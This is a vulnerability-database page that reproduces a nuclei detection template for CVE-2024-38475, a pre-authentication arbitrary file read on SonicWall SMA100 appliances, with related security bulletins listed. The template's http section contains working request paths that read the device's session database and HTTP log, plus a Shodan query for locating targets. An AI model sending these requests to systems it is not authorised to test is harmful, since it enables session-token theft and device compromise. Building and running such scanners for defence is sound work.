Lucene search
K

Sonicwall - Pre-Authentication Arbitrary File Read

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 81 Views

Improper escaping in Apache HTTP Server allows arbitrary file read, leading to code execution risks.

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins
Security Bulletin: Vulnerability in Apache HTTP Server (CVE-2024-38475) affects Power HMC.
28 Jan 202522:08
ibm
IBM Security Bulletins
Security Bulletin: IBM HTTP Server is vulnerable to multiple vulnerabilities due to the included Apache HTTP Server
29 Jul 202414:30
ibm
IBM Security Bulletins
Security Bulletin: IBM Aspera Console has addressed multiple vulnerabilities (CVE-2024-38477, CVE-2021-38963, CVE-2024-38475, CVE-2024-38474)
15 Apr 202502:56
ibm
IBM Security Bulletins
Security Bulletin: Multiple Vulnerabilities in http-server affect Cloud Pak System
29 Oct 202410:37
ibm
IBM Security Bulletins
Security Bulletin: TSSC/IMC addresses multiple security vulnerabilities.
22 May 202521:25
ibm
IBM Security Bulletins
Security Bulletin: Multiple security vulnerabilities have been identified in IBM HTTP Server shipped with IBM DevOps Code ClearCase [CVE-2024-38472, CVE-2024-38473, CVE-2024-38474, CVE-2024-38475, CVE-2024-38476, CVE-2024-38477, CVE-2024-39573]
28 Jan 202522:08
ibm
IBM Security Bulletins
Security Bulletin: Vulnerability with Apache HTTP, OpendJDK, python3 and spring-web affect IBM Cloud Object Storage Systems (Sept 2024v1)
19 Sep 202403:45
ibm
IBM Security Bulletins
Security Bulletin: Multiple Vulnerabilities have been identified in IBM HTTP Server shipped with IBM WebSphere Remote Server.
26 Jul 202413:13
ibm
IBM Security Bulletins
Security Bulletin: IBM Datapower Operations Dashboard could allow an attacker to map URLs to filesystem locations that are unreachable by any URL CVE-2024-38475
28 Jan 202522:08
ibm
IBM Security Bulletins
Security Bulletin: Multiple vulnerabilities within WebSphere Application and IBM HTTP Server and Java, affect IBM Tivoli Monitoring.
5 Sep 202419:12
ibm
Rows per page
id: CVE-2024-38475

info:
  name: Sonicwall - Pre-Authentication Arbitrary File Read
  author: shaikhyaser
  severity: critical
  description: |
    Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected.  Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.
  impact: |
    Unauthenticated attackers can read arbitrary files from the SonicWall SMA100 filesystem including configuration files, logs, and sensitive data, potentially leading to further exploitation or complete system compromise.
  remediation: |
    Upgrade to the latest patched version of SonicWall SMA100 or apply vendor-provided security updates.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-SonicWall-PreAuth-RCE-Chain/blob/main/watchTowr-vs-SonicWall-PreAuth-RCE-Chain.py
    - https://labs.watchtowr.com/sonicboom-from-stolen-tokens-to-remote-shells-sonicwall-sma100-cve-2023-44221-cve-2024-38475/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-38475
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-38475
    cwe-id: CWE-116
    epss-score: 0.99957
    epss-percentile: 0.99974
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SonicWall" html:"SMA"
  tags: cve,cve2024,sonicwal,sma-100,lfi,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/tmp/temp.db%3f.1.1.1.1a-1.css"
      - "{{BaseURL}}/mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css"

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "SQLite format","sessionId")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        dsl:
          - 'contains_all(body, "mod_antiloris","[pid")'
          - 'contains(content_type, "text/plain")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100886070a9c55dbc5c728503d06e8ed07a96d370ef9f4193b21189fd107caac8e80220184199148af02ae61534b322cce4a3cdfc63117149e5441fcb104476674a72fe:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.7High risk
Vulners AI Score8.7
CVSS 3.19.1
EPSS0.99957
SSVC
81